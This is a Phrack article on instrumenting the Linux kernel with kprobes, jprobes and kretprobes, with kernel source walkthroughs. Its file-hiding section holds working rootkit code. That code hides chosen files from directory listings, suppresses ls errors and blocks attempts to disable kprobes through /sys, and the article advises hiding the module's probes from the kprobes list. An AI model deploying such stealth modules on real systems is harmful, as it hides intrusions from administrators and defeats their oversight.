                             ==Phrack Inc.==

               Volume 0x0e, Issue 0x43, Phile #0x06 of 0x10

|=-----------------------------------------------------------------------=|
|=--------------=[ Kernel instrumentation using kprobes ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ by ElfMaster ]=---------------------------=|
|=----------------------=[ elfmaster@phrack.org ]=-----------------------=|
|=-----------------------------------------------------------------------=|


1 - Introduction
    1.1 - Why write it?
    1.2 - About kprobes
    1.3 - Jprobe example
    1.4 - Kretprobe example & Return probe patching technique

2 - Kprobes implementation
    2.1 - Kprobe implementation
    2.2 - Jprobe implementation
    2.3 - File hiding with jprobes/kretprobes and modifying kernel .text
    2.4 - Kretprobe implementation
    2.5 - A quick stop into modifying read-only kernel segments
    2.6 - An idea for a kretprobe implementation for hackers

3 - Patch to unpatch W^X (mprotect/mmap restrictions)

4 - Notes on rootkit detection for kprobes

5 - Summing it all up

6 - Greetz

7 - References and citations

8 - Code

---[ 1 - Introduction


----[ 1.1 - Why write it?


I will preface this by saying that kprobes can be used for anti-security
patching of the kernel. I would also like to point out that kprobes are not
the most efficient way to patch the kernel or to write rootkits and
backdoors, because they simply require more work -- extra innovation.
So why write this? Because... we are hackers. Hackers should be aware of
any and all resources available to them -- some more auspicious than
others. Nonetheless, kprobes are a sweet deal when you consider that they
are a native kernel API that is ripe for abuse, even without exceeding
its scope. Due to limitations discussed later on, kprobes require some
extra innovation when determining how to perform certain tasks, such as
file hiding and applying other interesting patches that could subvert or
even harden the kernel's integrity.
|
|
|
|
|
|
----[ 1.2 - About kprobes


Without a doubt, the best introduction to kprobes is kprobes.txt in the
Linux kernel source documentation. Make sure to read that when you get a
chance. Kprobes are a debugging API native to the Linux kernel, built on
the processor's breakpoint and single-step (trap) facilities -- whatever
the processor may be. We are going to assume x86, which at this time has
the most kprobe code developed.
|
|
|
|
--From kprobes.txt --
|
|
|
|
Kprobes enables you to dynamically break into any kernel routine and
|
|
collect debugging and performance information non-disruptively. You
|
|
can trap at almost any kernel code address, specifying a handler
|
|
routine to be invoked when the breakpoint is hit.
|
|
|
|
There are currently three types of probes: kprobes, jprobes, and
|
|
kretprobes (also called return probes). A kprobe can be inserted
|
|
on virtually any instruction in the kernel. A jprobe is inserted at
|
|
the entry to a kernel function, and provides convenient access to the
|
|
function's arguments. A return probe fires when a specified function
|
|
returns.
|
|
|
|
--
|
|
|
|
Based on this definition one can imagine that the kprobes interface may be
used to instrument the kernel in some useful ways, both for security and
anti-security; that is what this paper is about. In the recent past I
implemented some relatively powerful and complex security patches
using kprobes. That is not to say that other patching methods are not
still useful, but occasionally one may run into issues using traditional
methods such as kernel function trampolines, which are not SMP safe due
to the non-atomic nature of swapping code in and out. Kprobes are a native
interface, which is nice, but they still present some challenges due to
limitations we discuss throughout the paper. Kprobes can be used to patch
the kernel in some places, but cannot be used for everything. This is a
treatise that can shed some light on when and where kprobes can be used to
modify the behavior of the kernel. Sometimes they must be used in
conjunction with another patching method. Before we move on I wanted to
point out the following few facts:
|
|
|
|
kprobes show up as being registered here:
|
|
|
|
/sys/kernel/debug/kprobes/list
|
|
|
|
And can be enabled or disabled by writing a 0 or a 1 here:
|
|
|
|
/sys/kernel/debug/kprobes/enabled
|
|
|
|
The kprobe source code is located in the following locations:
|
|
/usr/src/linux/kernel/kprobes.c
|
|
/usr/src/linux/arch/x86/kernel/kprobes.c
|
|
|
|
Keep in mind that jprobes/kretprobes are 100% based on kprobes and
|
|
disabling kprobes like shown above will prevent any kretprobe/jprobe
|
|
code from working as well.
|
|
|
|
Moving on...
|
|
|
|
|
|
----[ 1.3 - Jprobe example
|
|
|
|
In this paper we will be working primarily with jprobes and kretprobes.
|
|
As shown in the kprobe documentation already, there are several functions
|
|
available for registering and unregistering these probes.
|
|
|
|
Let's pretend for a moment that we are interested in sys_mprotect, and we
want to inspect any calls to it and the args that are being passed. For
this we could register a jprobe for sys_mprotect. The following code
outlines the general idea. Consider that because we are setting a jprobe
on a syscall, we must either declare our jprobe handler with the
'asmlinkage' magic or get the args directly from the registers. In our
example I will get the args directly from the registers, just to show how
to obtain the registers for the current task.
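
For comparison, here is a minimal sketch (my own, not part of the original
module) of the asmlinkage variant mentioned above; with asmlinkage the
syscall arguments arrive on the stack, so the handler parameters already
hold the caller's values and no register digging is needed:

asmlinkage static int n_sys_mprotect_asm(unsigned long start, size_t len, long prot)
{
	/* start, len and prot are taken straight from the stack args */
	printk("start: 0x%lx len: %zu prot: 0x%lx\n", start, len, prot);

	/* always hand control back to the real sys_mprotect */
	jprobe_return();
	return 0;
}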
|
|
|
|
-- jprobe example 1 --
|
|
|
|
|
|
NOTE: The jprobe data types will be explained in detail in 2.2 [Jprobe
|
|
implementation]
|
|
|
|
int n_sys_mprotect(unsigned long start, size_t len, long prot)
|
|
{
|
|
struct pt_regs *regs = task_pt_regs(current);
|
|
|
|
start = regs->bx;
|
|
len = regs->cx;
|
|
prot = regs->dx;
|
|
|
|
printk("start: 0x%lx len: %u prot: 0x%lx\n", start, len, prot);
|
|
jprobe_return();
|
|
return 0;
|
|
}
|
|
|
|
/*
|
|
The following entry in struct jprobe is 'void *entry'
|
|
and simply points to the jprobe function handler that will
|
|
be executing when the probe is hit on the function entry
|
|
point.
|
|
*/
|
|
|
|
static struct jprobe mprotect_jprobe =
|
|
{
|
|
.entry = (kprobe_opcode_t *)n_sys_mprotect // function entry
|
|
};
|
|
|
|
static int __init jprobe_init(void)
{
	int ret;

	/* kp.addr is kprobe_opcode_t *addr; from struct kprobe and */
	/* points to the probe point where the trap will occur. In  */
	/* our case we are probing sys_mprotect                     */
	mprotect_jprobe.kp.addr = (kprobe_opcode_t *)kallsyms_lookup_name("sys_mprotect");

	if ((ret = register_jprobe(&mprotect_jprobe)) < 0)
	{
		printk("register_jprobe failed for sys_mprotect\n");
		return -1;
	}

	return 0;
}
|
|
|
|
|
|
int init_module(void)
|
|
{
|
|
jprobe_init();
|
|
return 0;
|
|
}
|
|
|
|
void exit_module(void)
{
	unregister_jprobe(&mprotect_jprobe);
}

/* without this, a function named exit_module is never run on rmmod */
module_exit(exit_module);
|
|
|
|
|
|
In the above code, we register a jprobe for sys_mprotect. This means that
|
|
a breakpoint instruction is placed on the entry point of the function,
|
|
and as soon as it gets called a trap occurs and control is passed to our
|
|
n_sys_mprotect() jprobe handler. From this point we can analyze data such
|
|
as the arguments passed either in registers or on the stack, as well as any
|
|
kernel data structures. We can also modify kernel data structures, which
|
|
is primarily what we rely on for our patches using kprobes. Any attempts
to modify the stack arguments or registers will be overridden as soon as
our handler function returns -- this is because kprobes saves the register
state and stack args prior to calling the handler, and restores these
values upon jprobe_return(), at which point the real syscall or function
will execute and do its thing. We will get into much more detail on this
topic, and on how to actually modify stack arguments, later on.
|
|
|
|
|
|
----[ 1.4 - Kretprobe example and return probe patching technique
|
|
|
|
Moving on to kretprobes (also known as return probes). Without kretprobes
it would not be nearly as easy to patch the kernel using kprobes; this is
because a kernel function that we set a jprobe on might, as soon as our
jprobe handler returns, re-modify the very kernel data structure that we
modified. If we bring a kretprobe into the situation, we can modify that
kernel data structure after the real kernel function returns. Here is an
example... Let's say we want to modify the (fictitious) kernel data
structure 'kstruct->x'. We do not know what value we want to assign to it
until 'function_A' executes, but as soon as the real 'function_A' executes
after our jprobe handler, it sets 'kstruct->x' to some value of its own.
This is where kretprobes come into play. The approach we take can be
called the 'return probe patching' technique.
|
|
|
|
1. [jprobe handler for function_A] -> Determines the value that we want to set on kstruct->x
|
|
2. [function_A] -> Sets the value of kstruct->x to some value.
|
|
3. [kretprobe handler for function_A] -> Sets the value of kstruct->x to value determined by jprobe handler.
|
|
|
|
So as you can see, with kretprobes we end up being able to set the final
|
|
verdict on a value.
|
|
|
|
Here is a quick example of registering a kretprobe. We will use sys_mprotect
|
|
for this example as well.
|
|
|
|
The kretprobe data types will be explained in the section 2.4 [kretprobes
|
|
implementation].
|
|
|
|
static int mprotect_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
|
|
{
|
|
printk("Original return address: 0x%lx\n", (unsigned long)ri->ret_addr);
|
|
return 0;
|
|
|
|
|
|
}
|
|
static struct kretprobe mprotect_kretprobe =
|
|
{
|
|
.handler = mprotect_ret_handler, // return probe handler
|
|
.maxactive = NR_CPUS // max number of kretprobe instances
|
|
};
|
|
|
|
|
|
int init_module(void)
{
	mprotect_kretprobe.kp.addr = (kprobe_opcode_t *)kallsyms_lookup_name("sys_mprotect");
	return register_kretprobe(&mprotect_kretprobe);
}
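
The snippet above leaves out the module cleanup; a minimal sketch of what
it might look like (the nmissed counter is a member of struct kretprobe
and counts probe hits that were dropped because maxactive was too low):

void exit_module(void)
{
	unregister_kretprobe(&mprotect_kretprobe);
	printk("missed %d sys_mprotect returns\n", mprotect_kretprobe.nmissed);
}
module_exit(exit_module);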
|
|
|
|
As you can see I utilize kallsyms_lookup_name(), but interestingly a probe
can be set on virtually any instruction within the kernel; whatever means
you use to get that location is up to you (e.g. System.map).
|
|
|
|
|
|
So as you can see, the code is straightforward. From an internal point
of view, by the time sys_mprotect returns, the address at the top of
the stack (the return address) has been modified to point to a function
|
|
called kretprobe_trampoline() which in turn sets things up to call
|
|
our mprotect_ret_handler() function where we can inspect and modify
|
|
kernel data. No point in modifying the registers because they were
|
|
all saved on the stack and will be reset as soon as our handler returns.
|
|
More on this in the next section. The kretprobe trampoline function will be
|
|
explored in detail in 2.4 [Kretprobe implementation].
|
|
|
|
|
|
---[ 2 - Kprobes implementation
|
|
|
|
----[ 2.1 - Kprobe implementation
|
|
|
|
Firstly I want to make sure we are on the same page about what a basic
|
|
kprobe is, and the general idea of how it works.
|
|
|
|
-- Taken from kprobes.txt:
|
|
|
|
When a kprobe is registered, Kprobes makes a copy of the probed
|
|
instruction and replaces the first byte(s) of the probed instruction
|
|
with a breakpoint instruction (e.g., int3 on i386 and x86_64).
|
|
|
|
When a CPU hits the breakpoint instruction, a trap occurs, the CPU's
|
|
registers are saved, and control passes to Kprobes via the
|
|
notifier_call_chain mechanism.
|
|
Kprobes executes the "pre_handler" associated with the kprobe, passing
the handler the addresses of the kprobe struct and the saved registers.

Next, Kprobes single-steps its copy of the probed instruction.
(It would be simpler to single-step the actual instruction in place,
but then Kprobes would have to temporarily remove the breakpoint
instruction. This would open a small time window when another CPU
could sail right past the probepoint.)

After the instruction is single-stepped, Kprobes executes the
"post_handler," if any, that is associated with the kprobe.
Execution then continues with the instruction following the probepoint.
|
|
|
|
--
|
|
|
|
So to clarify, when registering a typical kprobe a pre_handler should
|
|
always be assigned so that you can inspect data or do whatever you want
|
|
during that point. A post handler may or may not be assigned.
|
|
|
|
Since we are primarily using jprobes and kretprobes, which are extensions
of the kprobe interface, I have chosen to discuss their implementation
rather than that of a plain kprobe. All you need to know for now is that
registering a basic kprobe inserts a breakpoint instruction at the desired
location and executes a pre and a post handler that you assign. Jprobes
and kretprobes are themselves built on a basic kprobe with a pre and post
handler, but in their case the pre and post handlers point to special
kernel functions [/usr/src/linux/arch/x86/kernel/kprobes.c] that act as a
sort of prologue/epilogue around the handler you supply. More will be
revealed in the following sections.
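
Since no plain kprobe example appears elsewhere in this paper, here is a
minimal sketch of one with its own pre and post handlers. The probed
symbol and the handler names are only illustrative; on kernels whose
struct kprobe lacks the .symbol_name member, assign kp.addr via
kallsyms_lookup_name() as in the earlier examples.

static int handler_pre(struct kprobe *p, struct pt_regs *regs)
{
	printk("pre_handler: breakpoint at %p hit\n", p->addr);
	return 0;
}

static void handler_post(struct kprobe *p, struct pt_regs *regs,
                         unsigned long flags)
{
	printk("post_handler: single-step of %p completed\n", p->addr);
}

static struct kprobe kp = {
	.symbol_name  = "sys_mprotect",
	.pre_handler  = handler_pre,
	.post_handler = handler_post,
};

int init_module(void)
{
	return register_kprobe(&kp);
}

void cleanup_module(void)
{
	unregister_kprobe(&kp);
}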
|
|
|
|
|
|
----[ 2.2 - Jprobe implementation
|
|
|
|
If we are aware of the internal implementation of jprobes and kretprobes
then we can utilize them better, and we could even patch the interface
itself to act more like we want. That, however, defeats the purpose of
this paper, which aims at patching the kernel using the kprobes interface
as it is -- although we will explore some external modifications of
kprobes later on.
|
|
|
|
Firstly take a look at the following struct:
|
|
|
|
struct jprobe {
|
|
struct kprobe kp;
|
|
void *entry; /* probe handling code to jump to */
|
|
};
|
|
|
|
When we call register_jprobe() it in turn calls register_jprobes(&jp, 1).
|
|
register_jprobes() is all about setting up the jprobe pre/post and entry
|
|
handler.
|
|
|
|
-- snippet from register_jprobes() in /usr/src/linux/kernel/kprobes.c --
|
|
|
|
/* See how jprobes utilizes kprobes? It uses the */
|
|
/* pre/post handler */
|
|
jp->kp.pre_handler = setjmp_pre_handler;
|
|
jp->kp.break_handler = longjmp_break_handler;
|
|
ret = register_kprobe(&jp->kp);
|
|
--
|
|
|
|
The pre_handler is called before your function/entry handler and is
responsible for saving the contents of the stack and the registers, and
for setting the instruction pointer. In normal circumstances the developer
has no control over the pre/post handlers for jprobes, because the kprobe
pre and post handler entries within struct kprobe do not point to your own
custom handlers, but instead to specialized handlers specifically for the
jprobe prologue/epilogue.
|
|
|
|
/* Called before addr is executed. */
|
|
kprobe_pre_handler_t pre_handler;
|
|
|
|
/* Called after addr is executed, unless... */
|
|
kprobe_post_handler_t post_handler;
|
|
|
|
You could say that the execution of a jprobe looks like this:
|
|
|
|
1. [jprobe pre_handler] Backup stack and register state
|
|
2. [jprobe function handler] Do elite modifications to kernel
|
|
3. [jprobe post_handler] Restore original stack and registers.
|
|
|
|
Lets take a peek at the pre_handler which backs up the stack and registers.
|
|
|
|
int __kprobes setjmp_pre_handler(struct kprobe *p, struct pt_regs *regs)
|
|
{
|
|
struct jprobe *jp = container_of(p, struct jprobe, kp);
|
|
unsigned long addr;
|
|
struct kprobe_ctlblk *kcb = get_kprobe_ctlblk();
|
|
|
|
kcb->jprobe_saved_regs = *regs;
|
|
kcb->jprobe_saved_sp = stack_addr(regs);
|
|
addr = (unsigned long)(kcb->jprobe_saved_sp);
|
|
|
|
/*
|
|
* As Linus pointed out, gcc assumes that the callee
|
|
* owns the argument space and could overwrite it, e.g.
|
|
* tailcall optimization. So, to be absolutely safe
|
|
* we also save and restore enough stack bytes to cover
|
|
* the argument area.
|
|
*/
|
|
memcpy(kcb->jprobes_stack, (kprobe_opcode_t *)addr,
|
|
MIN_STACK_SIZE(addr));
|
|
regs->flags &= ~X86_EFLAGS_IF;
|
|
trace_hardirqs_off();
|
|
regs->ip = (unsigned long)(jp->entry);
|
|
return 1;
|
|
}
|
|
|
|
Pay close attention to the code comment above; like with Chuck Norris...
if Linus says it, then it MUST be true!
|
|
|
|
As you can see, the function gets the current stack location using the stack_addr()
|
|
macro, and then memcpy's it over to kcb->jprobes_stack which is a backup of the
|
|
stack to be restored in the post handler. The stack being restored prior to the
|
|
real function being called does impose some obvious restrictions, but that does
|
|
not mean that we can't manipulate the pointer values that are passed on the stack
|
|
which is something we take advantage of in section 2.3 (File hiding). After
|
|
the jprobe handler is finished, the jprobe post handler is called -- here
|
|
is the code.
|
|
|
|
int __kprobes longjmp_break_handler(struct kprobe *p, struct pt_regs *regs)
|
|
{
|
|
struct kprobe_ctlblk *kcb = get_kprobe_ctlblk();
|
|
u8 *addr = (u8 *) (regs->ip - 1);
|
|
struct jprobe *jp = container_of(p, struct jprobe, kp);
|
|
|
|
if ((addr > (u8 *) jprobe_return) &&
|
|
(addr < (u8 *) jprobe_return_end)) {
|
|
if (stack_addr(regs) != kcb->jprobe_saved_sp) {
|
|
struct pt_regs *saved_regs =
|
|
&kcb->jprobe_saved_regs;
|
|
printk(KERN_ERR
|
|
"current sp %p does not match saved sp %p\n",
|
|
stack_addr(regs), kcb->jprobe_saved_sp);
|
|
printk(KERN_ERR "Saved registers for
|
|
jprobe %p\n", jp);
|
|
show_registers(saved_regs);
|
|
printk(KERN_ERR "Current registers\n");
|
|
show_registers(regs);
|
|
BUG();
|
|
}
|
|
*regs = kcb->jprobe_saved_regs;
|
|
memcpy((kprobe_opcode_t *)(kcb->jprobe_saved_sp),
|
|
kcb->jprobes_stack,
|
|
MIN_STACK_SIZE(kcb->jprobe_saved_sp));
|
|
preempt_enable_no_resched();
|
|
return 1;
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
|
|
The code primarily restores the stack and re-enables preemption; probe
|
|
handlers are run with preemption disabled.
|
|
|
|
|
|
----[ 2.3 - File hiding using jprobes/kretprobes
|
|
|
|
Let's consider a simple file hiding approach that consists of using the
dirent->d_name pointer in filldir64().
|
|
|
|
|
|
char *hidden_files[] =
|
|
{
|
|
#define HIDDEN_FILES_MAX 3
|
|
"test1",
|
|
"test2",
|
|
"test3"
|
|
};
|
|
|
|
struct getdents_callback64 {
|
|
struct linux_dirent64 __user * current_dir;
|
|
struct linux_dirent64 __user * previous;
|
|
int count;
|
|
int error;
|
|
};
|
|
|
|
/* Global data for kretprobe to act on */
|
|
static struct global_dentry_info
|
|
{
|
|
unsigned long d_name_ptr;
|
|
int bypass;
|
|
} g_dentry;
|
|
|
|
/* Our jprobe handler that globally saves the pointer value of dirent->d_name */
|
|
/* so that our kretprobe can modify that location */
|
|
static int j_filldir64(void * __buf, const char * name, int namlen, loff_t
|
|
offset, u64 ino, unsigned int d_type)
|
|
{
|
|
|
|
int found_hidden_file, i;
|
|
struct linux_dirent64 __user *dirent;
|
|
struct getdents_callback64 * buf = (struct getdents_callback64 *) __buf;
|
|
dirent = buf->current_dir;
|
|
int reclen = ROUND_UP64(NAME_OFFSET(dirent) + namlen + 1);
|
|
|
|
/* Initialize custom stuff */
|
|
g_dentry.bypass = 0;
|
|
found_hidden_file = 0;
|
|
|
|
for (i = 0; i < HIDDEN_FILES_MAX; i++)
|
|
if (strcmp(hidden_files[i], name) == 0)
|
|
found_hidden_file++;
|
|
if (!found_hidden_file)
|
|
goto end;
|
|
|
|
/* Create pointer to where we need to modify in dirent */
|
|
/* since someone is trying to view a file we want hidden */
|
|
g_dentry.d_name_ptr = (unsigned long)(unsigned char *)dirent->d_name;
|
|
g_dentry.bypass++; // note that we want to bypass viewing this file
|
|
|
|
end:
|
|
jprobe_return();
|
|
return 0;
|
|
}
|
|
|
|
/* Our kretprobe handler, which we use to nullify the filename */
|
|
/* Remember the 'return probe technique'? Well this is it. */
|
|
static int filldir64_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
|
|
{
|
|
char *ptr, null = 0;
|
|
/* Someone is looking at one of our hidden files */
|
|
if (g_dentry.bypass)
|
|
{
|
|
/* Lets nullify the filename so it simply is invisible */
|
|
ptr = (char *)g_dentry.d_name_ptr;
|
|
		copy_to_user((char *)ptr, &null, sizeof(char));
	}

	return 0;
}
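
The registration glue for these two handlers is not shown above; a minimal
sketch of what it could look like, resolving the "filldir64" symbol through
kallsyms_lookup_name() as in the earlier examples:

static struct jprobe filldir64_jprobe = {
	.entry = (kprobe_opcode_t *)j_filldir64
};

static struct kretprobe filldir64_kretprobe = {
	.handler = filldir64_ret_handler,
	.maxactive = NR_CPUS
};

int init_module(void)
{
	unsigned long addr = kallsyms_lookup_name("filldir64");

	filldir64_jprobe.kp.addr = (kprobe_opcode_t *)addr;
	filldir64_kretprobe.kp.addr = (kprobe_opcode_t *)addr;

	if (register_jprobe(&filldir64_jprobe) < 0)
		return -1;
	if (register_kretprobe(&filldir64_kretprobe) < 0) {
		unregister_jprobe(&filldir64_jprobe);
		return -1;
	}
	return 0;
}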
|
|
|
|
|
|
The code above is quite adept at hiding files based on getdents64 being called
|
|
but unfortunately 'ls' from GNU coreutils will call lstat64 for every d_name found,
|
|
and if some of the d_names start with a null byte then we will see an error returned
|
|
by lstat saying "Cannot access : : file not found". So if we are hiding 3 files, then
|
|
we will see that error message 3 times prior to the directory listing (which will not
|
|
show the hidden files). One of the primary limitations of kprobe patching
|
|
is that we cannot modify the return value of a function; the closest we can get is
|
|
setting up a return probe to modify data that the function may have operated on.
|
|
There are some indirect methods of altering the return value at times, but after
|
|
following the code path for lstat64 I found no way to remedy the issue using kprobes.
|
|
Instead I settled on the not-so-elegant approach of redirecting stderr to /dev/null
|
|
by setting a jprobe and a return probe on sys_write. Additionally, while modifying
|
|
sys_write, we might as well redirect any attempts to disable kprobes to /dev/null
|
|
as well. A super user can simply 'echo 0 > /sys/kernel/debug/kprobes/enabled' to
|
|
disable the kprobes interface (We don't want this). One of the parameters we will
|
|
pass to insmod when installing our LKM will be the inode of the 'enabled' /sys entry.
|
|
Below is the code for our modified sys_write.
|
|
|
|
asmlinkage static int j_sys_write(int fd, void *buf, unsigned int len)
|
|
{
|
|
char *s = (char *)buf;
|
|
char null = '\0';
|
|
char devnull[] = "/dev/null";
|
|
struct file *file;
|
|
struct dentry *dentry = NULL;
|
|
unsigned int ino;
|
|
int ret;
|
|
char comm[255];
|
|
|
|
stream_redirect = 0; // do we redirect to /dev/null?
|
|
|
|
/* Make sure this is an ls program */
|
|
/* otherwise we'd prevent other programs */
|
|
/* From being able to send 'cannot access' */
|
|
/* in their stderr stream, possibly */
|
|
get_task_comm(comm, current);
|
|
if (strcmp(comm, "ls") != 0)
|
|
goto out;
|
|
|
|
/* check to see if this is an ls stat complaint, or ls -l weirdness */
|
|
/* There are two separate calls to sys_write hence two strstr checks */
|
|
if (strstr(s, "cannot access") || strstr(s, "ls:"))
|
|
{
|
|
printk("Going to redirect\n");
|
|
goto redirect;
|
|
}
|
|
/* Check to see if they are trying to disable kprobes */
|
|
/* with 'echo 0 > /sys/kernel/debug/kprobes/enabled' */
|
|
file = fget(fd);
|
|
if (!file)
|
|
goto out;
|
|
dentry = dget(file->f_dentry);
|
|
if (!dentry)
|
|
goto out;
|
|
ino = dentry->d_inode->i_ino;
|
|
dput(dentry);
|
|
fput(file);
|
|
if (ino != enabled_ino)
|
|
goto out;
|
|
|
|
redirect:
|
|
/* If we made it here, then we are doing a redirect to /dev/null */
|
|
stream_redirect++;
|
|
mm_segment_t o_fs = get_fs();
|
|
set_fs(KERNEL_DS);
|
|
|
|
n_sys_close(fd);
|
|
fd = n_sys_open(devnull, O_RDWR, 0);
|
|
|
|
set_fs(o_fs);
|
|
global_fd = fd;
|
|
|
|
out:
|
|
jprobe_return();
|
|
return 0;
|
|
}
|
|
/* Here is the return handler to close the fd to /dev/null. */
|
|
static int sys_write_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
|
|
{
|
|
if (stream_redirect)
|
|
{
|
|
n_sys_close(global_fd);
|
|
stream_redirect = 0;
|
|
}
|
|
return 0;
|
|
}
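
The helpers used above (stream_redirect, global_fd, enabled_ino,
n_sys_open() and n_sys_close()) are not part of this excerpt; a sketch of
how they might be declared and wired up, resolving the real syscalls
through kallsyms as elsewhere in this paper:

static int stream_redirect;        /* set by j_sys_write, cleared by the ret handler */
static int global_fd;              /* fd currently pointing at /dev/null */
static unsigned long enabled_ino;  /* inode of /sys/kernel/debug/kprobes/enabled */
module_param(enabled_ino, ulong, 0);

/* pointers to the real syscalls, resolved at init time */
static long (*n_sys_open)(const char __user *filename, int flags, int mode);
static long (*n_sys_close)(unsigned int fd);

static int resolve_syscalls(void)
{
	n_sys_open = (void *)kallsyms_lookup_name("sys_open");
	n_sys_close = (void *)kallsyms_lookup_name("sys_close");
	return (n_sys_open && n_sys_close) ? 0 : -1;
}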
|
|
|
|
We close the existing file descriptor and open a new one that will
|
|
use the same fd number. This redirection of stderr to /dev/null is only for the
|
|
current process. To understand it a bit more we can follow the code path of
|
|
do_sys_open(), I've added some extra comments:
|
|
|
|
long do_sys_open(int dfd, const char __user *filename, int flags, int mode)
|
|
{
|
|
char *tmp = getname(filename);
|
|
int fd = PTR_ERR(tmp);
|
|
|
|
if (!IS_ERR(tmp)) {
|
|
fd = get_unused_fd_flags(flags);
|
|
if (fd >= 0) {
|
|
struct file *f = do_filp_open(dfd, tmp, flags,
|
|
mode, 0);
|
|
if (IS_ERR(f)) {
|
|
put_unused_fd(fd);
|
|
fd = PTR_ERR(f);
|
|
} else {
|
|
|
|
/* Notice fsnotify_open() */
|
|
fsnotify_open(f->f_path.dentry);
|
|
|
|
/* Associate fd with /dev/null */
|
|
fd_install(fd, f);
|
|
trace_do_sys_open(tmp, flags, mode);
|
|
}
|
|
}
|
|
putname(tmp);
|
|
}
|
|
return fd;
|
|
}
|
|
|
|
The new file descriptor is associated with its new file (struct
|
|
files_struct *) for the current task using fd_install().
|
|
|
|
void fd_install(unsigned int fd, struct file *file)
|
|
{
|
|
struct files_struct *files = current->files; // <-- notice here
|
|
struct fdtable *fdt;
|
|
spin_lock(&files->file_lock);
|
|
fdt = files_fdtable(files); // <-- notice here
|
|
BUG_ON(fdt->fd[fd] != NULL);
|
|
rcu_assign_pointer(fdt->fd[fd], file); // <-- notice here
|
|
spin_unlock(&files->file_lock);
|
|
}
|
|
|
|
|
|
One important note to the reader: /sys/kernel/debug/kprobes/list is the
file which shows any registered kprobes. Simply use a redirect technique
like the one we used above to track opens of that file and redirect any
writes to stdout to /dev/null if the list contains a probe that you have
registered. Very trivial, and absolutely necessary to maintain a stealthy
presence.
|
|
|
|
As the topic of rootkits has become trite ...
|
|
I would like to introduce some other kprobe examples. Firstly
|
|
let us discuss the Kretprobe implementation in detail. It will
|
|
give some more insight into the limitations of kprobes and also
|
|
expand your mind on how the kprobe implementation may be modified --
|
|
which is not covered in this paper.
|
|
|
|
|
|
----[ 2.4 - Kretprobe implementation
|
|
|
|
The kretprobe implementation is especially interesting. Primarily because
|
|
it is an innovative and nicely engineered chunk of code. Here is how it
|
|
works.
|
|
|
|
-- From the kprobes.txt --
|
|
|
|
When you call register_kretprobe(), Kprobes establishes a kprobe at
|
|
the entry to the function. When the probed function is called and this
|
|
probe is hit, Kprobes saves a copy of the return address, and replaces
|
|
the return address with the address of a "trampoline." The trampoline
|
|
is an arbitrary piece of code -- typically just a nop instruction.
|
|
At boot time, Kprobes registers a kprobe at the trampoline.
|
|
|
|
The kretprobe implementation is really just a creative way of using
kprobes: registering them and assigning them trap handler functions that
deal with modifying the return address.
|
|
|
|
-- From /usr/src/linux/kernel/kprobes.c --
|
|
|
|
int __kprobes register_kretprobe(struct kretprobe *rp)
|
|
{
|
|
int ret = 0;
|
|
struct kretprobe_instance *inst;
|
|
int i;
|
|
void *addr;
|
|
|
|
... <code> ...
|
|
|
|
rp->kp.pre_handler = pre_handler_kretprobe;
|
|
rp->kp.post_handler = NULL;
|
|
rp->kp.fault_handler = NULL;
|
|
rp->kp.break_handler = NULL;
|
|
|
|
... <code> ...
|
|
}
|
|
NOTE:
|
|
Notice the rp->kp.pre_handler -- kp is struct kprobe
|
|
and the pre_handler is assigned pre_handler_kretprobe.
|
|
|
|
So when the return probe is hit, pre_handler_kretprobe() will call
|
|
arch_prepare_kretprobe() which saves the original return address and inserts
|
|
the new one:
|
|
|
|
void __kprobes arch_prepare_kretprobe(struct kretprobe_instance *ri,
|
|
struct pt_regs *regs)
|
|
{
|
|
unsigned long *sara = stack_addr(regs);
|
|
|
|
ri->ret_addr = (kprobe_opcode_t *) *sara;
|
|
|
|
/* Replace the return addr with trampoline addr */
|
|
*sara = (unsigned long) &kretprobe_trampoline;
|
|
}
|
|
|
|
Notice the last line, which sets the return address to the trampoline. The
trampoline is actually defined in an assembly stub; for 32-bit x86 (the
x86_64 branch of the kernel source is elided here) it looks like this:


asm volatile (
		".global kretprobe_trampoline\n"
		"kretprobe_trampoline: \n"
		/*
		 * Skip cs, ip, orig_ax and gs.
		 * trampoline_handler() will plug in these values
		 */
		"	subl $16, %esp\n"
		"	pushl %fs\n"
		"	pushl %es\n"
		"	pushl %ds\n"
		"	pushl %eax\n"
		"	pushl %ebp\n"
		"	pushl %edi\n"
		"	pushl %esi\n"
		"	pushl %edx\n"
		"	pushl %ecx\n"
		"	pushl %ebx\n"
		"	movl %esp, %eax\n"
		"	call trampoline_handler\n"
		/* Move flags to cs */
		"	movl 56(%esp), %edx\n"
		"	movl %edx, 52(%esp)\n"
		/* Replace saved flags with true return address. */
		"	movl %eax, 56(%esp)\n"
		"	popl %ebx\n"
		"	popl %ecx\n"
		"	popl %edx\n"
		"	popl %esi\n"
		"	popl %edi\n"
		"	popl %ebp\n"
		"	popl %eax\n"
		/* Skip ds, es, fs, gs, orig_ax and ip */
		"	addl $24, %esp\n"
		"	popf\n"
		"	ret\n");
|
|
|
|
After the register state is backed up on the stack the stub calls
|
|
trampoline_handler() which essentially executes any return probe
|
|
handlers associated with the kretprobe for the given function. Looking at
|
|
the actual function gives some more insight.
|
|
|
|
static __used __kprobes void *trampoline_handler(struct pt_regs *regs)
|
|
{
|
|
struct kretprobe_instance *ri = NULL;
|
|
struct hlist_head *head, empty_rp;
|
|
struct hlist_node *node, *tmp;
|
|
unsigned long flags, orig_ret_address = 0;
|
|
unsigned long trampoline_address = (unsigned
|
|
long)&kretprobe_trampoline;
|
|
|
|
INIT_HLIST_HEAD(&empty_rp);
|
|
kretprobe_hash_lock(current, &head, &flags);
|
|
/* fixup registers */
|
|
#ifdef CONFIG_X86_64
|
|
regs->cs = __KERNEL_CS;
|
|
#else
|
|
regs->cs = __KERNEL_CS | get_kernel_rpl();
|
|
regs->gs = 0;
|
|
#endif
|
|
regs->ip = trampoline_address;
|
|
regs->orig_ax = ~0UL;
|
|
|
|
/*
|
|
* It is possible to have multiple instances associated with a
|
|
* given
|
|
* task either because multiple functions in the call path have
|
|
* return probes installed on them, and/or more than one
|
|
* return probe was registered for a target function.
|
|
*
|
|
* We can handle this because:
|
|
* - instances are always pushed into the head of the list
|
|
* - when multiple return probes are registered for the same
|
|
* function, the (chronologically) first instance's ret_addr
|
|
* will be the real return address, and all the rest will
|
|
* point to kretprobe_trampoline.
|
|
*/
|
|
hlist_for_each_entry_safe(ri, node, tmp, head, hlist) {
|
|
